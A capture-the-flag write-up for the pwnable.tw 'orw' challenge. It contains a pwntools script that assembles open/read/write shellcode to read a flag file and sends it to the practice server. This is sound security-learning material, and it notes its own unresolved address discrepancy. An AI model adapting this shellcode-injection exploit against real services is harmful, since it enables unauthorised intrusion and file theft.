pwnable.tw

[pwnable.tw] orw writeup

st4rbuucks 2018. 10. 11. 14:37

Challenge


Solving

running binary :

and part of main disassembly :

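The binary reads our payload, stores it at the address 0x8048370, and then runs the code there. (The script below hard-codes pointers in the 0x804a0xx range, such as 0x804a09c for the filename, so the buffer address quoted here is worth re-checking against the disassembly.)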

As the problem description says, we should probably build the shellcode using only the open, read and write syscalls.

Here is my Python script:

#!/usr/bin/env python
# pwnable.tw orw

from pwn import *

# Target selector read by the __main__ block: a truthy value starts the local
# ./orw binary and pauses before the payload is sent; 0 connects to the
# remote challenge service instead.
debug = 0

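def exploit():
	"""Assemble the open/read/write payload and send it over the global tube ``s``.

	The payload is a sequence of i386 ``int 0x80`` syscalls followed by two
	NUL-terminated strings:

	* open(0x804a09c, 0, 0x804a0ab) -- opens the path string appended below
	* read(fd, 0x804a100, 0x64)     -- reads up to 0x64 bytes into a scratch buffer
	* write(1, 0x804a100, n)        -- echoes the n bytes that read returned

	All pointers are absolute. 0x804a09c is the payload start plus the 0x3c
	bytes of assembled code, and 0x804a0ab is 15 bytes further on, just past
	the path string. They hold only while the target loads the payload at the
	fixed address 0x804a09c - 0x3c and the instruction sequence keeps its
	length, so the length is checked before sending.
	NOTE(review): a fixed load address suggests a non-PIE binary -- confirm.

	The third argument of open(2) is an integer mode that is only consulted
	when a file is created. With flags == 0 the pointer placed in edx is not
	used, so the trailing "r" string is kept only to leave the payload bytes
	unchanged.

	The payload is built from bytes literals so the concatenation works on
	both Python 2 and Python 3 (where asm() returns bytes).

	Raises:
		ValueError: if the assembled code is not 0x3c bytes long, because the
			hard-coded string pointers would then point at the wrong offsets.
	"""
	instructions = [
		'mov eax, 0x5',			# syscall : open
		'mov ebx, 0x804a09c',	# filename (path string appended after the code)
		'mov ecx, 0x0',			# flags
		'mov edx, 0x804a0ab',	# mode slot; see docstring, not consulted here
		'int 0x80',
		'mov ebx, eax',			# fd returned by open (no error check)
		'mov eax, 0x3',			# syscall : read
		'mov ecx, 0x804a100',	# buf
		'mov edx, 0x64',		# count
		'int 0x80',
		'mov edx, eax',			# count = bytes actually read
		'mov eax, 0x4',			# syscall : write
		'mov ebx, 0x1',			# fd 1 (stdout)
		'mov ecx, 0x804a100',	# buf
		'int 0x80',
	]
	# Assemble one instruction at a time, exactly as the original script did.
	code = b''.join(asm(line) for line in instructions)

	# The string pointers above are only valid for a 0x3c-byte code section.
	if len(code) != 0x3c:
		raise ValueError(
			'assembled code is %d bytes, but the hard-coded pointers assume 60'
			% len(code)
		)

	payload = code + b'/home/orw/flag\x00' + b'r\x00'
	s.send(payload)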

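if __name__ == '__main__':
	# `s` is bound at module level here, so exploit() reads it as a global.
	if debug:
		s = process('./orw')
		pause()		# waits for the user before continuing, e.g. to attach a debugger
	else:
		s = remote('chall.pwnable.tw', 10001)

	try:
		exploit()
		s.interactive()
	finally:
		# Close the tube even if sending or the interactive session raises.
		s.close()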


FL4G